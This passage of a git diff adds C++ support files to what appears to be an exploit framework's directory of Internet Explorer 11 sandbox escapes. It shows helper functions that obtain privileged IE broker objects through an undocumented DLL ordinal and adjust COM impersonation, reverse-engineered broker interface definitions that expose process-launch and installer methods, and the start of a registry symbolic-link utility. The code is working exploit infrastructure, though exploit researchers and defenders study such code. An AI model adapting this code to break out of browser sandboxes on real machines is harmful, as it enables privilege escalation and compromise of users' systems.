+			RPC_C_IMP_LEVEL_IDENTIFY, nullptr, EOAC_DYNAMIC_CLOAKING);
+		DebugPrintf("SetBlanket: %08X", hr);
+		sec->Release();
+	}
+	else
+	{
+		DebugPrintf("Error getting client security: %08X", hr);
+	}
+}
+
+IIEUserBrokerPtr CreateBroker()
+{
+	HMODULE hMod = LoadLibrary(L"iertutil.dll");
+
+	fCoCreateUserBroker pfCoCreateUserBroker = (fCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58);
+
+	if (pfCoCreateUserBroker)
+	{
+		IIEUserBrokerPtr broker;
+
+		HRESULT ret = pfCoCreateUserBroker(&broker);
+
+		DebugPrintf("CreateBroker: %08X - %p", ret, broker);
+
+		return broker;
+	}
+
+	return nullptr;
+}
+
+IShdocvwBroker* CreateSHDocVw()
+{
+	IIEUserBrokerPtr broker = CreateBroker();
+
+	if (broker != nullptr)
+	{
+		HRESULT ret;
+		IShdocvwBroker* shdocvw;
+		ret = broker->BrokerCreateKnownObject(CLSID_CShdocvwBroker, GetSHDocIID(), (IUnknown**)&shdocvw);
+		DebugPrintf("IShdocvwBroker: %08X %p", ret, shdocvw);
+
+		if (SUCCEEDED(ret))
+		{
+			return shdocvw;
+		}
+	}
+
+	return nullptr;
+}
+
+bstr_t GetWindowsSystemDirectory()
+{
+	WCHAR buf[MAX_PATH];
+
+	GetSystemDirectory(buf, MAX_PATH);
+
+	return buf;
+}
+
+bstr_t GetExecutableFileName(HMODULE hModule)
+{
+	WCHAR buf[MAX_PATH];
+
+	::GetModuleFileNameW(hModule, buf, MAX_PATH);
+
+	return buf;
+}
+
+bstr_t GetSessionPath()
+{
+	std::wstringstream ss;
+
+	WCHAR objPath[MAX_PATH + 1] = { 0 };
+	ULONG length = MAX_PATH;
+	DWORD dwSessionId;
+
+	if (ProcessIdToSessionId(GetCurrentProcessId(), &dwSessionId))
+	{
+		ss << L"\\Sessions\\" << dwSessionId;
+
+		return ss.str().c_str();
+	}
+
+	return L"";
+}
+
+LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString)
+{
+	return RegSetValueEx(hKey, lpName, 0, REG_SZ, (const BYTE*)lpString, (wcslen(lpString) + 1) * sizeof(WCHAR));
+}
+
+LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d)
+{
+	return RegSetValueEx(hKey, lpName, 0, REG_DWORD, (const BYTE*)&d, sizeof(d));
+}
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h
new file mode 100755
index 0000000000..db2c100fc8
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h
@@ -0,0 +1,21 @@
+#include "interfaces.h"
+
+#include <vector>
+
+bstr_t GetTemp(LPCWSTR name);
+bstr_t GetTempPath();
+bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len);
+std::vector<unsigned char> ReadFileToMem(LPCWSTR name);
+void DebugPrintf(LPCSTR lpFormat, ...);
+bstr_t GetUserSid();
+void DisableImpersonation(IUnknown* pUnk);
+void SetCloaking(IUnknown* pUnk);
+IIEUserBrokerPtr CreateBroker();
+IShdocvwBroker* CreateSHDocVw();
+bstr_t GetWindowsSystemDirectory();
+bstr_t GetExecutableFileName(HMODULE hModule);
+extern "C" int DeleteLink(LPCWSTR par_src);
+extern "C" int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile);
+bstr_t GetSessionPath();
+LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString);
+LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d);
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h
new file mode 100755
index 0000000000..c210b8ed2e
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h
@@ -0,0 +1,258 @@
+#pragma once
+
+#include <tchar.h>
+#include <Windows.h>
+#include <comdef.h>
+#include <Shtypes.h>
+#include <DocObj.h>
+
+struct __declspec(uuid("1AC7516E-E6BB-4A69-B63F-E841904DC5A6")) IIEUserBroker : IUnknown
+{
+	virtual HRESULT STDMETHODCALLTYPE Initialize(HWND *, LPCWSTR, LPDWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CreateProcessW(DWORD pid, LPWSTR appName, LPWSTR cmdline, DWORD, DWORD, LPCSTR, WORD*, /* _BROKER_STARTUPINFOW*/ void *, /* _BROKER_PROCESS_INFORMATION */ void*) = 0;
+	virtual HRESULT STDMETHODCALLTYPE WinExec(DWORD pid, LPCSTR, DWORD, DWORD*) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerCreateKnownObject(_GUID const &, _GUID const &, IUnknown * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstance() = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstanceEx(DWORD pid, _GUID const &, IUnknown *, DWORD, _COSERVERINFO *, DWORD, /* tagBROKER_MULTI_QI */ void *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerCoGetClassObject(DWORD pid, _GUID const &, DWORD, _COSERVERINFO *, _GUID const &, IUnknown * *) = 0;
+};
+
+struct __declspec(uuid("BDB57FF2-79B9-4205-9447-F5FE85F37312")) CIEAxInstallBroker
+{
+};
+
+struct __declspec(uuid("B2103BDB-B79E-4474-8424-4363161118D5")) IIEAxInstallBrokerBroker : IUnknown
+{
+	virtual HRESULT STDMETHODCALLTYPE BrokerGetAxInstallBroker(REFCLSID rclsid, REFIID riid, int unknown, int type, HWND, IUnknown** ppv) = 0;
+};
+
+_COM_SMARTPTR_TYPEDEF(IIEAxInstallBrokerBroker, __uuidof(IIEAxInstallBrokerBroker));
+
+struct ERF
+{
+	//+0x000 erfOper          : Int4B
+	//	+ 0x004 erfType : Int4B
+	//	+ 0x008 fError : Int4B
+
+	int erfOper;
+	int erfType;
+	int fError;
+};
+
+struct FNAME
+{
+	/*+0x000 pszFilename      : Ptr32 Char
+	+ 0x004 pNextName : Ptr32 sFNAME
+	+ 0x008 status : Uint4B*/
+
+	char* pszFilenane;
+	FNAME* pNextName;
+	UINT status;
+};
+
+struct SESSION
+{
+	/*+0x000 cbCabSize        : Uint4B
+	+ 0x004 erf : ERF
+	+ 0x010 pFileList : Ptr32 sFNAME
+	+ 0x014 cFiles : Uint4B
+	+ 0x018 flags : Uint4B
+	+ 0x01c achLocation : [260] Char
+	+ 0x120 achFile : [260] Char
+	+ 0x224 achCabPath : [260] Char
+	+ 0x328 pFilesToExtract : Ptr32 sFNAME*/
+
+	UINT cbCabSize;
+	ERF erf;
+	FNAME* pFileList;
+	UINT cFiles;
+	UINT flags;
+	char achLocation[260];
+	char achFile[260];
+	char achCabPath[260];
+	FNAME* pFilesToExtract;
+};
+
+struct __declspec(uuid("BC0EC710-A3ED-4F99-B14F-5FD59FDACEA3")) IIeAxiInstaller2 : IUnknown
+{
+	virtual HRESULT STDMETHODCALLTYPE VerifyFile(BSTR, HWND__ *, BSTR, BSTR, BSTR, unsigned int, unsigned int, _GUID const &, BSTR*, unsigned int *, unsigned char **) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RunSetupCommand(BSTR, HWND__ *, BSTR, BSTR, BSTR, BSTR, unsigned int, unsigned int *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE InstallFile(BSTR sessionGuid, HWND__ *, BSTR sourcePath, BSTR sourceFile, BSTR destPath, BSTR destFile, unsigned int unk) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RegisterExeFile(BSTR sessionGuid, BSTR cmdline, int unk, _PROCESS_INFORMATION *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RegisterDllFile(BSTR, BSTR, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE InstallCatalogFile(BSTR, BSTR) = 0;
+	virtual HRESULT STDMETHODCALLTYPE UpdateLanguageCheck(BSTR, unsigned short const *, _FILETIME) = 0;
+	virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE UpdateModuleUsage(BSTR, char const *, char const *, char const *, char const *, unsigned int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE EnumerateFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ExtractFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RemoveExtractedFilesAndDirs(BSTR, SESSION *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CreateExtensionsManager(BSTR, _GUID const &, IUnknown * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RegisterDllFile2(BSTR, BSTR, int, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit2(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, int *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE UpdateAllowedDomainsList(_GUID const &, BSTR, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DeleteExtractedFile(char const *) = 0;
+};
+
+_COM_SMARTPTR_TYPEDEF(IIeAxiInstaller2, __uuidof(IIeAxiInstaller2));
+
+struct __declspec(uuid("9AEA8A59-E0C9-40F1-87DD-757061D56177")) IIeAxiAdminInstaller : IUnknown
+{
+	virtual HRESULT STDMETHODCALLTYPE  InitializeAdminInstaller(BSTR, BSTR, BSTR*) = 0;
+};
+
+_COM_SMARTPTR_TYPEDEF(IIeAxiAdminInstaller, __uuidof(IIeAxiAdminInstaller));
+
+struct __declspec(uuid("A4AAAE00-22E5-4742-ABB7-379D9493A3B7")) IShdocvwBroker : IUnknown
+{
+	virtual HRESULT STDMETHODCALLTYPE RedirectUrl(WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void*) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RedirectShortcut(WORD const *, WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RedirectUrlWithBindInfo(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE NavigateUrlInNewTabInstance(/* _BROKER_BIND_INFO */ void *, /*_BROKER_REDIRECT_DETAIL */ void *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowInternetOptions(HWND *, WORD const *, WORD const *, long, ITEMIDLIST_ABSOLUTE * *, DWORD, int *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsZones(HWND *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsLanguages(HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowPopupManager(HWND *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowCachesAndDatabases(HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ConfigurePopupExemption(HWND *, int, WORD const *, int *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ConfigurePopupMgr(HWND *, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RemoveFirstHomePage(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SetHomePage(HWND *, long, ITEMIDLIST_ABSOLUTE * *, long) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RemoveHomePage(HWND *, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE FixInternetSecurity(HWND *, int *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowManageAddons(HWND *, DWORD, _GUID *, DWORD, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CacheExtFileVersion(_GUID const &, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowAxApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SendLink(ITEMIDLIST_ABSOLUTE const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SendPage(HWND *, IDataObject *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE NewMessage(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ReadMail(HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SetAsBackground(LPCWSTR) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowSaveBrowseFile(HWND *, WORD const *, WORD const *, int, int, WORD * *, DWORD *, DWORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SaveAsComplete(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SaveAsFile(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE StartImportExportWizard(int, HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE EditWith(HWND *, DWORD, HANDLE, DWORD, LPCWSTR, LPCWSTR, LPCWSTR) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowSaveImage(HWND *, WORD const *, DWORD, WORD * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SaveImage(WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CreateShortcut(/* _internet_shortcut_params */ void*, int, HWND *, WORD *, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowSynchronizeUI(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE OpenFolderAndSelectItem(WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoGetOpenFileNameDialog(/* _SOpenDlg */ void *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoGetLocationPlatformConsent(HWND *, DWORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowSaveFileName(HWND *, WORD const *, WORD const *, WORD const *, WORD const *, DWORD, WORD *, DWORD, WORD const *, WORD * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SaveFile(HWND *, DWORD, DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE VerifyTrustAndExecute(HWND *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetFeedByUrl(WORD const *, WORD * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerAddToFavoritesEx(HWND *, ITEMIDLIST_ABSOLUTE const *, WORD const *, DWORD, IOleCommandTarget *, WORD *, DWORD, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE Subscribe(HWND *, WORD const *, WORD const *, int, int, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE MarkAllItemsRead(WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE MarkItemsRead(WORD const *, DWORD *, DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE Properties(HWND *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DeleteFeedItem(HWND *, WORD const *, DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DeleteFeed(HWND *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DeleteFolder(HWND *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE Refresh(WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE MoveFeed(HWND *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE MoveFeedFolder(HWND *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RenameFeed(HWND *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RenameFeedFolder(HWND *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE NewFeedFolder(LPCWSTR) = 0;
+	virtual HRESULT STDMETHODCALLTYPE FeedRefreshAll(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowFeedAuthDialog(HWND *, WORD const *, /* FEEDTASKS_AUTHTYPE */ DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowAddSearchProvider(HWND *, WORD const *, WORD const *, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE InitHKCUSearchScopesRegKey(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoShowDeleteBrowsingHistoryDialog(HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE StartAutoProxyDetection(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE EditAntiPhishingOptinSetting(HWND *, DWORD, int *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowMyPictures(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ChangeIntranetSettings(HWND *, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE FixProtectedModeSettings(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowAddService(HWND *, WORD const *, WORD const *, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowAddWebFilter(HWND *, WORD const *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoBrowserRegister() = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoBrowserRevoke(long) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoOnNavigate(long, VARIANT *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE AddDesktopComponent(WORD *, WORD *, VARIANT *, VARIANT *, VARIANT *, VARIANT *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoOnCreated(long, IUnknown *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetShellWindows(IUnknown * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CustomizeSettings(short, short, WORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE OnFocus(int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE IsProtectedModeUrl(LPCWSTR) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoDiagnoseConnectionProblems(HWND *, WORD *, WORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE PerformDoDragDrop(HWND *, /* IEDataObjectWrapper */ void *, /* IEDropSourceWrapper */ void *, DWORD, DWORD, DWORD *, long *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE TurnOnFeedSyncEngine(HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE InternetSetPerSiteCookieDecisionW(WORD const *, DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SetAttachmentUserOverride(LPCWSTR) = 0;
+	virtual HRESULT STDMETHODCALLTYPE WriteClassesOfCategory(_GUID const &, int, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerSetFocus(DWORD, HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconA(DWORD, /* _BROKER_NOTIFYICONDATAA */ void *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconW(DWORD, /* _BROKER_NOTIFYICONDATAW */ void*) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DisplayVirtualizedFolder(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerSetWindowPos(HWND *, HWND *, int, int, int, int, DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE WriteUntrustedControlDetails(_GUID const &, WORD const *, WORD const *, DWORD, BYTE *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SetComponentDeclined(char const *, char const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoShowPrintDialog(/* _BROKER_PRINTDLG */ void*) = 0;
+	virtual HRESULT STDMETHODCALLTYPE NavigateHomePages(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowAxDomainApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ActivateExtensionFromCLSID(HWND *, WORD const *, DWORD, DWORD, DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateNewIEWindow(DWORD, _GUID const &, void * *, int, DWORD, int, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BeginFakeModalityForwardingToTab() = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerEnableWindow(int, int *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE EndFakeModalityForwardingToTab(HWND *, long) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CloseOldTabIfFailed(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE EnableSuggestedSites(HWND *, int) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SetProgressValue(HWND *, DWORD, DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerStartNewIESession(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CompatDetachInputQueue(HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CompatAttachInputQueue(void) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SetToggleKeys(DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RepositionInfrontIE(HWND *, int, int, int, int, DWORD) = 0;
+	//virtual HRESULT STDMETHODCALLTYPE ReportShipAssert(DWORD, DWORD, DWORD, WORD const *, WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowOpenSafeOpenDialog(HWND *, /* _BROKER_SAFEOPENDLGPARAM */ void *, DWORD *, DWORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerAddSiteToStart(HWND *, WORD *, WORD const *, long, DWORD) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SiteModeAddThumbnailButton(DWORD *, HWND *, WORD *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE SiteModeAddButtonStyle(int *, HWND *, DWORD, WORD *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE IsSiteModeFirstRun(int, WORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE IsImmersiveSiteModeFirstRun(int, WORD const *, WORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetImmersivePinnedState(DWORD, int, int *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerDoSiteModeDragDrop(DWORD, long *, DWORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE EnterUILock(long) = 0;
+	virtual HRESULT STDMETHODCALLTYPE LeaveUILock(long) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CredentialAdd(/* _IECREDENTIAL */ void *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CredentialGet(WORD const *, WORD const *, /*_IECREDENTIAL */ void * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CredentialFindAllByUrl(WORD const *, DWORD *, /*  _IECREDENTIAL */ void * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE CredentialRemove(WORD const *, WORD const *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowOpenFile(HWND *, DWORD, DWORD, WORD *, WORD *, WORD const *, WORD const *, WORD const *, /* _OPEN_FILE_RESULT */ void * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowImmersiveOpenFilePicker(HWND *, int, WORD const *, IUnknown * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RegisterFileDragDrop(HWND *, DWORD, unsigned char *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE RevokeFileDragDrop(HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropA(HWND *, DWORD, char * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropW(HWND *, DWORD, WORD * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowEPMCompatDocHostConsent(HWND *, WORD const *, WORD const *, int *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetModuleInfoFromSignature(WORD const *, WORD * *, DWORD, WORD * *, WORD * *, WORD * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShellExecWithActivationHandler(HWND *, LPCWSTR, LPCWSTR, int,  /* _MSLAUNCH_HANDLER_STATUS */ void *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShellExecFolderUri(LPCWSTR) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ShowIMMessageDialog(HWND *, WORD const *, WORD const *, /* _IM_BUTTON_LABEL_ID */ void *, DWORD, DWORD, DWORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetFileHandle(HWND *, BSTR filename, BYTE * hash, DWORD hashlen, HANDLE*) = 0;
+	virtual HRESULT STDMETHODCALLTYPE MOTWCreateFileW(DWORD dwProcessId, BSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, int dwOpenMode, DWORD dwFlagsAndAttributes, ULONGLONG* h, DWORD *error) = 0;
+	virtual HRESULT STDMETHODCALLTYPE MOTWFindFileW() = 0;
+	virtual HRESULT STDMETHODCALLTYPE MOTWGetFileDataW() = 0;
+	virtual HRESULT STDMETHODCALLTYPE WinRTInitializeWithWindow(IUnknown *, HWND *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE DoProvisionNetworks(HWND *, WORD const *, DWORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetAccessibilityStylesheet(DWORD, unsigned __int64 *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetAppCacheUsage(WORD const *, unsigned __int64 *, unsigned __int64 *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE HiddenTabRequest(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* _HIDDENTAB_REQUEST_INFO */ void *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetMaxCpuSpeed(DWORD *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetProofOfPossessionTokensForUrl(WORD const *, DWORD *, /* _IEProofOfPossessionToken */ void * *) = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetLoginUrl(LPWSTR*) = 0;
+	virtual HRESULT STDMETHODCALLTYPE ScheduleDeleteEncryptedMediaData() = 0;
+	virtual HRESULT STDMETHODCALLTYPE IsDeleteEncryptedMediaDataPending() = 0;
+	virtual HRESULT STDMETHODCALLTYPE GetFrameAppDataPathA() = 0;
+	virtual HRESULT STDMETHODCALLTYPE BrokerHandlePrivateNetworkFailure() = 0;
+
+};
+
+
+_COM_SMARTPTR_TYPEDEF(IIEUserBroker, __uuidof(IIEUserBroker));
+_COM_SMARTPTR_TYPEDEF(IShdocvwBroker, __uuidof(IShdocvwBroker));
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp
new file mode 100755
index 0000000000..50830eee4a
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp
@@ -0,0 +1,161 @@
+/*--------------------------------------------------------------------
+REGLN - Manage Windows Rregistry Links                           V20R0
+======================================================================
+            Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
+
+  The following Copyrights apply:
+
+    Copyright (c) 1998-2005 by Antoni Sawicki  <as@ntinternals.net>
+    Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
+    Copyright (c) 1998 by Mark Russinovich  <mark@sysinternals.com>
+
+  License:
+
+  This software is distributed under the terms  and  conditions  of
+  GPL  - GNU  General  Public  License. The software is provided AS
+  IS and ABSOLUTELY NO WARRANTY IS  GIVEN.  The  author  takes   no
+  responsibility for any damages or consequences  of  usage of this 
+  software. For more information, please read the attached GPL.TXT.
+
+--------------------------------------------------------------------*/
+
+#define _CRT_SECURE_NO_WARNINGS
+
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <wchar.h>
+#include "regln.h"
+#include "Utils.h"
+
+
+int checkargs(int argc, char *argv[]); 
+char *win2ntapi(char *win, int len); 
+int ntapi_init(void); 
+int usage(void); 
+
+static fNtCreateKey NtCreateKey;
+static fNtDeleteKey NtDeleteKey;
+static fNtSetValueKey NtSetValueKey;
+
+int DeleteLink(LPCWSTR par_src)
+{
+	DWORD disposition, status;
+	HANDLE hdl_nt_keyhandle;
+	UNICODE_STRING nt_keyname;
+	OBJECT_ATTRIBUTES nt_object_attributes;
+
+	ntapi_init();
+
+	nt_keyname.Buffer = par_src;
+	nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
+
+	nt_object_attributes.ObjectName = &nt_keyname;
+	nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE | REG_OPTION_OPEN_LINK_ATTR;
+	nt_object_attributes.RootDirectory = NULL;   //
+	nt_object_attributes.SecurityDescriptor = NULL;   // unused for this object type
+	nt_object_attributes.SecurityQualityOfService = NULL;   //
+	nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
+
+	// open link
+	status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE, &disposition);
+
+	if (status == 0) {
+		DebugPrintf("DEBUG: %ls opened successfully.\n", par_src);
+
+		// delete
